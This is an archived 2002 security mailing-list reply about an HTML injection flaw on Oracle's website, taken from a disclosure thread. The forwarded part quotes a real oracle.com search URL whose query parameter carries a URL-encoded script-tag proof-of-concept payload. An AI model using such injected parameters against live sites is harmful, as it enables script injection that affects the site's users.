Re: Oracle Databases Allow HTML/SQL injection
From: KF (dotslash@snosoft.com)Date: 04/16/02
- Previous message: KF: "Re: Oracle Databases Allow HTML/SQL injection"
- In reply to: david evlis reign: "Oracle Databases Allow HTML/SQL injection"
- Next in thread: Jim Kovalchuk: "Re: Oracle Databases Allow HTML/SQL injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 16 Apr 2002 11:58:17 -0700 From: KF <dotslash@snosoft.com> To: david evlis reign <davidreign@hotmail.com>
Looks like we stumbled on the same thing... Snosoft was gonna send this
out with our april fools stuff...
--- Begin Forwarded message ----
On Mon, 1 Apr 2002, l0rt wrote:
> dots cross site scripting of oracle baby... ;o) ain't he sexy.
> -l0rt-
> > HEH
> >
> > http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
> >
> > -KF
- Previous message: KF: "Re: Oracle Databases Allow HTML/SQL injection"
- In reply to: david evlis reign: "Oracle Databases Allow HTML/SQL injection"
- Next in thread: Jim Kovalchuk: "Re: Oracle Databases Allow HTML/SQL injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
